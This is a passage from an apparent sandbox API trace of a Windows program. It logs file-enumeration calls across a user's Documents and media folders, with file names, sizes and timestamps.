ftLastAccessTime.dwHighDateTime=0x1d5df91, ftLastWriteTime.dwLowDateTime=0x4eb38ee0, ftLastWriteTime.dwHighDateTime=0x1d5df91, nFileSizeHigh=0x0, nFileSizeLow=0xaa53, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BdD6 3od3oZknu3ORg1.swf", cAlternateFileName="BDD63O~1.SWF")) returned 1 [0201.039] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9366cff0, ftCreationTime.dwHighDateTime=0x1d5de7b, ftLastAccessTime.dwLowDateTime=0xcfa54d60, ftLastAccessTime.dwHighDateTime=0x1d5e3f4, ftLastWriteTime.dwLowDateTime=0xcfa54d60, ftLastWriteTime.dwHighDateTime=0x1d5e3f4, nFileSizeHigh=0x0, nFileSizeLow=0x16bd5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="c0a9bFnD.mkv", cAlternateFileName="")) returned 1 [0201.039] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10466880, ftCreationTime.dwHighDateTime=0x1d60a66, ftLastAccessTime.dwLowDateTime=0x10466880, ftLastAccessTime.dwHighDateTime=0x1d60a66, ftLastWriteTime.dwLowDateTime=0x7e386300, ftLastWriteTime.dwHighDateTime=0x1d60a59, nFileSizeHigh=0x0, nFileSizeLow=0xade00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe", cAlternateFileName="CUSERS~1.EXE")) returned 1 [0201.039] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0201.039] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9643500, ftCreationTime.dwHighDateTime=0x1d5de5b, ftLastAccessTime.dwLowDateTime=0x74f00840, ftLastAccessTime.dwHighDateTime=0x1d5d8ac, ftLastWriteTime.dwLowDateTime=0x74f00840, ftLastWriteTime.dwHighDateTime=0x1d5d8ac, nFileSizeHigh=0x0, nFileSizeLow=0x18059, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="elKgZ adOre6qYbXG.odp", cAlternateFileName="ELKGZA~1.ODP")) returned 1 [0201.039] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa94b5e30, ftCreationTime.dwHighDateTime=0x1d5e7ea, ftLastAccessTime.dwLowDateTime=0x30979610, ftLastAccessTime.dwHighDateTime=0x1d5e723, ftLastWriteTime.dwLowDateTime=0x30979610, ftLastWriteTime.dwHighDateTime=0x1d5e723, nFileSizeHigh=0x0, nFileSizeLow=0x114f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="f2y6WykfmB1T.flv", cAlternateFileName="F2Y6WY~1.FLV")) returned 1 [0201.039] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fa8fbd0, ftCreationTime.dwHighDateTime=0x1d5dedc, ftLastAccessTime.dwLowDateTime=0xb2934790, ftLastAccessTime.dwHighDateTime=0x1d5dc3d, ftLastWriteTime.dwLowDateTime=0xb2934790, ftLastWriteTime.dwHighDateTime=0x1d5dc3d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fDly50O", cAlternateFileName="")) returned 1 [0201.039] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a0eb270, ftCreationTime.dwHighDateTime=0x1d5e0de, ftLastAccessTime.dwLowDateTime=0x58742750, ftLastAccessTime.dwHighDateTime=0x1d5dff0, ftLastWriteTime.dwLowDateTime=0x58742750, ftLastWriteTime.dwHighDateTime=0x1d5dff0, nFileSizeHigh=0x0, nFileSizeLow=0xe0cb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hAxdwDH31tOgP85.m4a", cAlternateFileName="HAXDWD~1.M4A")) returned 1 [0201.039] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37a60420, ftCreationTime.dwHighDateTime=0x1d5da0b, ftLastAccessTime.dwLowDateTime=0xd26fe100, ftLastAccessTime.dwHighDateTime=0x1d5d86d, ftLastWriteTime.dwLowDateTime=0xd26fe100, ftLastWriteTime.dwHighDateTime=0x1d5d86d, nFileSizeHigh=0x0, nFileSizeLow=0x12050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="N_1fqFQPI_Z.m4a", cAlternateFileName="N_1FQF~1.M4A")) returned 1 [0201.039] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4c0fc0, ftCreationTime.dwHighDateTime=0x1d5e7ed, ftLastAccessTime.dwLowDateTime=0x1bad4ba0, ftLastAccessTime.dwHighDateTime=0x1d5e0fc, ftLastWriteTime.dwLowDateTime=0x1bad4ba0, ftLastWriteTime.dwHighDateTime=0x1d5e0fc, nFileSizeHigh=0x0, nFileSizeLow=0xcfb0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rbw9vz.jpg", cAlternateFileName="")) returned 1 [0201.039] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72332bd0, ftCreationTime.dwHighDateTime=0x1d5dd86, ftLastAccessTime.dwLowDateTime=0xed2e1d90, ftLastAccessTime.dwHighDateTime=0x1d5e68c, ftLastWriteTime.dwLowDateTime=0xed2e1d90, ftLastWriteTime.dwHighDateTime=0x1d5e68c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sZ1h4QiinWnf", cAlternateFileName="SZ1H4Q~1")) returned 1 [0201.039] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0a55d90, ftCreationTime.dwHighDateTime=0x1d5e25a, ftLastAccessTime.dwLowDateTime=0x8527cfc0, ftLastAccessTime.dwHighDateTime=0x1d5e579, ftLastWriteTime.dwLowDateTime=0x8527cfc0, ftLastWriteTime.dwHighDateTime=0x1d5e579, nFileSizeHigh=0x0, nFileSizeLow=0x13acb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tWvw_Q1vCCLUwEx.avi", cAlternateFileName="TWVW_Q~1.AVI")) returned 1 [0201.039] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6b2fec0, ftCreationTime.dwHighDateTime=0x1d5e512, ftLastAccessTime.dwLowDateTime=0x78fba220, ftLastAccessTime.dwHighDateTime=0x1d5da30, ftLastWriteTime.dwLowDateTime=0x78fba220, ftLastWriteTime.dwHighDateTime=0x1d5da30, nFileSizeHigh=0x0, nFileSizeLow=0x8c3e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vTdPeiNlgjct5.m4a", cAlternateFileName="VTDPEI~1.M4A")) returned 1 [0201.039] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf42f59a0, ftCreationTime.dwHighDateTime=0x1d5d81e, ftLastAccessTime.dwLowDateTime=0xd9a8a4e0, ftLastAccessTime.dwHighDateTime=0x1d5df55, ftLastWriteTime.dwLowDateTime=0xd9a8a4e0, ftLastWriteTime.dwHighDateTime=0x1d5df55, nFileSizeHigh=0x0, nFileSizeLow=0x17998, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vtRaYVcLR-.bmp", cAlternateFileName="VTRAYV~1.BMP")) returned 1 [0201.039] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x224fd910, ftCreationTime.dwHighDateTime=0x1d5e7db, ftLastAccessTime.dwLowDateTime=0x76f826f0, ftLastAccessTime.dwHighDateTime=0x1d5db62, ftLastWriteTime.dwLowDateTime=0x76f826f0, ftLastWriteTime.dwHighDateTime=0x1d5db62, nFileSizeHigh=0x0, nFileSizeLow=0xaa27, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xeCrf8bBjM.jpg", cAlternateFileName="XECRF8~1.JPG")) returned 1 [0201.039] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf12a1650, ftCreationTime.dwHighDateTime=0x1d5de68, ftLastAccessTime.dwLowDateTime=0xb4305040, ftLastAccessTime.dwHighDateTime=0x1d5e294, ftLastWriteTime.dwLowDateTime=0xb4305040, ftLastWriteTime.dwHighDateTime=0x1d5e294, nFileSizeHigh=0x0, nFileSizeLow=0xe7c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z9XMIcR5j1YonGU3n.mp3", cAlternateFileName="Z9XMIC~1.MP3")) returned 1 [0201.039] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x528b3090, ftCreationTime.dwHighDateTime=0x1d5dedd, ftLastAccessTime.dwLowDateTime=0x75fa4430, ftLastAccessTime.dwHighDateTime=0x1d5da8c, ftLastWriteTime.dwLowDateTime=0x75fa4430, ftLastWriteTime.dwHighDateTime=0x1d5da8c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zUdwhkJ", cAlternateFileName="")) returned 1 [0201.039] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3813fdb0, ftCreationTime.dwHighDateTime=0x1d5e7ec, ftLastAccessTime.dwLowDateTime=0x22347f40, ftLastAccessTime.dwHighDateTime=0x1d5d9ed, ftLastWriteTime.dwLowDateTime=0x22347f40, ftLastWriteTime.dwHighDateTime=0x1d5d9ed, nFileSizeHigh=0x0, nFileSizeLow=0xcbba, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZzWIu6eAVS.jpg", cAlternateFileName="ZZWIU6~1.JPG")) returned 1 [0201.039] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44683180, ftCreationTime.dwHighDateTime=0x1d5d7b1, ftLastAccessTime.dwLowDateTime=0x416d25a0, ftLastAccessTime.dwHighDateTime=0x1d5dd72, ftLastWriteTime.dwLowDateTime=0x416d25a0, ftLastWriteTime.dwHighDateTime=0x1d5dd72, nFileSizeHigh=0x0, nFileSizeLow=0x1070e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_CHUcr-x1w49.mp3", cAlternateFileName="_CHUCR~1.MP3")) returned 1 [0201.039] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44683180, ftCreationTime.dwHighDateTime=0x1d5d7b1, ftLastAccessTime.dwLowDateTime=0x416d25a0, ftLastAccessTime.dwHighDateTime=0x1d5dd72, ftLastWriteTime.dwLowDateTime=0x416d25a0, ftLastWriteTime.dwHighDateTime=0x1d5dd72, nFileSizeHigh=0x0, nFileSizeLow=0x1070e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_CHUcr-x1w49.mp3", cAlternateFileName="_CHUCR~1.MP3")) returned 0 [0201.039] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c35d0 | out: hHeap=0x2c0000) returned 1 [0201.039] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.039] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0201.039] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.039] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.039] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.040] PathFindFileNameW (pszPath="") returned="" [0201.040] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd93ece20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd93ece20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3845e8 | out: hHeap=0x2c0000) returned 1 [0201.040] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd93ece20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd93ece20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.041] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49a8e310, ftCreationTime.dwHighDateTime=0x1d5e535, ftLastAccessTime.dwLowDateTime=0x72144ca0, ftLastAccessTime.dwHighDateTime=0x1d5db2a, ftLastWriteTime.dwLowDateTime=0x72144ca0, ftLastWriteTime.dwHighDateTime=0x1d5db2a, nFileSizeHigh=0x0, nFileSizeLow=0x164b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2A46Wijpabeg.doc", cAlternateFileName="2A46WI~1.DOC")) returned 1 [0201.041] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb28e6330, ftCreationTime.dwHighDateTime=0x1d5d998, ftLastAccessTime.dwLowDateTime=0x1242ef10, ftLastAccessTime.dwHighDateTime=0x1d5e828, ftLastWriteTime.dwLowDateTime=0x1242ef10, ftLastWriteTime.dwHighDateTime=0x1d5e828, nFileSizeHigh=0x0, nFileSizeLow=0x19cd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4DZkt_Zg.csv", cAlternateFileName="")) returned 1 [0201.041] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3964e90, ftCreationTime.dwHighDateTime=0x1d5a71d, ftLastAccessTime.dwLowDateTime=0x5e7f3580, ftLastAccessTime.dwHighDateTime=0x1d58731, ftLastWriteTime.dwLowDateTime=0x5e7f3580, ftLastWriteTime.dwHighDateTime=0x1d58731, nFileSizeHigh=0x0, nFileSizeLow=0x6f86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4vPNQhxvPxw2Jt5YMeW.docx", cAlternateFileName="4VPNQH~1.DOC")) returned 1 [0201.041] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c276f20, ftCreationTime.dwHighDateTime=0x1d5da6f, ftLastAccessTime.dwLowDateTime=0x5d41eef0, ftLastAccessTime.dwHighDateTime=0x1d5e254, ftLastWriteTime.dwLowDateTime=0x5d41eef0, ftLastWriteTime.dwHighDateTime=0x1d5e254, nFileSizeHigh=0x0, nFileSizeLow=0xa3ec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5MP3.doc", cAlternateFileName="")) returned 1 [0201.041] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x283de860, ftCreationTime.dwHighDateTime=0x1d5d112, ftLastAccessTime.dwLowDateTime=0xc8436b20, ftLastAccessTime.dwHighDateTime=0x1d5ac8f, ftLastWriteTime.dwLowDateTime=0xc8436b20, ftLastWriteTime.dwHighDateTime=0x1d5ac8f, nFileSizeHigh=0x0, nFileSizeLow=0x11ccb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bDCJecVJFUpJJKq-L.pptx", cAlternateFileName="BDCJEC~1.PPT")) returned 1 [0201.041] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0201.041] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ef8b670, ftCreationTime.dwHighDateTime=0x1d56dfe, ftLastAccessTime.dwLowDateTime=0x5d12e910, ftLastAccessTime.dwHighDateTime=0x1d5e07a, ftLastWriteTime.dwLowDateTime=0x5d12e910, ftLastWriteTime.dwHighDateTime=0x1d5e07a, nFileSizeHigh=0x0, nFileSizeLow=0x14bc6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EqwtueAIzhhR_q7drkB.xlsx", cAlternateFileName="EQWTUE~1.XLS")) returned 1 [0201.041] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x463890b0, ftCreationTime.dwHighDateTime=0x1d5e362, ftLastAccessTime.dwLowDateTime=0x59086520, ftLastAccessTime.dwHighDateTime=0x1d5d8aa, ftLastWriteTime.dwLowDateTime=0x59086520, ftLastWriteTime.dwHighDateTime=0x1d5d8aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fZpil8Uu6QzTlWoWB", cAlternateFileName="FZPIL8~1")) returned 1 [0201.041] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68fd0f10, ftCreationTime.dwHighDateTime=0x1d59cbb, ftLastAccessTime.dwLowDateTime=0x44dac870, ftLastAccessTime.dwHighDateTime=0x1d59360, ftLastWriteTime.dwLowDateTime=0x44dac870, ftLastWriteTime.dwHighDateTime=0x1d59360, nFileSizeHigh=0x0, nFileSizeLow=0x1073e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kcEMhu.xlsx", cAlternateFileName="KCEMHU~1.XLS")) returned 1 [0201.041] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e3e0e0, ftCreationTime.dwHighDateTime=0x1d5deb0, ftLastAccessTime.dwLowDateTime=0x87ee8ce0, ftLastAccessTime.dwHighDateTime=0x1d5e816, ftLastWriteTime.dwLowDateTime=0x87ee8ce0, ftLastWriteTime.dwHighDateTime=0x1d5e816, nFileSizeHigh=0x0, nFileSizeLow=0x1278e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LYGm7s5W9niIJnIJRT.docx", cAlternateFileName="LYGM7S~1.DOC")) returned 1 [0201.041] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f6951f0, ftCreationTime.dwHighDateTime=0x1d5e642, ftLastAccessTime.dwLowDateTime=0x21dbe000, ftLastAccessTime.dwHighDateTime=0x1d57c0b, ftLastWriteTime.dwLowDateTime=0x21dbe000, ftLastWriteTime.dwHighDateTime=0x1d57c0b, nFileSizeHigh=0x0, nFileSizeLow=0x33c7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mH0lFHceDUbr9.xlsx", cAlternateFileName="MH0LFH~1.XLS")) returned 1 [0201.041] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0201.041] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0201.041] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0201.041] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0201.041] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34fab0e0, ftCreationTime.dwHighDateTime=0x1d5e3e8, ftLastAccessTime.dwLowDateTime=0xa906cb70, ftLastAccessTime.dwHighDateTime=0x1d5a06a, ftLastWriteTime.dwLowDateTime=0xa906cb70, ftLastWriteTime.dwHighDateTime=0x1d5a06a, nFileSizeHigh=0x0, nFileSizeLow=0x11b42, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ojVoPqmMcqQsP E.docx", cAlternateFileName="OJVOPQ~1.DOC")) returned 1 [0201.041] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0201.041] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e65bca0, ftCreationTime.dwHighDateTime=0x1d5bcf2, ftLastAccessTime.dwLowDateTime=0x98358b60, ftLastAccessTime.dwHighDateTime=0x1d59e17, ftLastWriteTime.dwLowDateTime=0x98358b60, ftLastWriteTime.dwHighDateTime=0x1d59e17, nFileSizeHigh=0x0, nFileSizeLow=0xb574, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="owDXXAnogti1-3p.xlsx", cAlternateFileName="OWDXXA~1.XLS")) returned 1 [0201.041] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa842f740, ftCreationTime.dwHighDateTime=0x1d5a10f, ftLastAccessTime.dwLowDateTime=0x7a3d8ed0, ftLastAccessTime.dwHighDateTime=0x1d573e4, ftLastWriteTime.dwLowDateTime=0x7a3d8ed0, ftLastWriteTime.dwHighDateTime=0x1d573e4, nFileSizeHigh=0x0, nFileSizeLow=0xf37, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pl91V.pptx", cAlternateFileName="PL91V~1.PPT")) returned 1 [0201.041] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1395460, ftCreationTime.dwHighDateTime=0x1d5c2d1, ftLastAccessTime.dwLowDateTime=0xb3f5e620, ftLastAccessTime.dwHighDateTime=0x1d5d5ed, ftLastWriteTime.dwLowDateTime=0xb3f5e620, ftLastWriteTime.dwHighDateTime=0x1d5d5ed, nFileSizeHigh=0x0, nFileSizeLow=0x1582, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qwArXX-Y-.pptx", cAlternateFileName="QWARXX~1.PPT")) returned 1 [0201.041] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdea5cbf0, ftCreationTime.dwHighDateTime=0x1d5e511, ftLastAccessTime.dwLowDateTime=0xa61497c0, ftLastAccessTime.dwHighDateTime=0x1d58964, 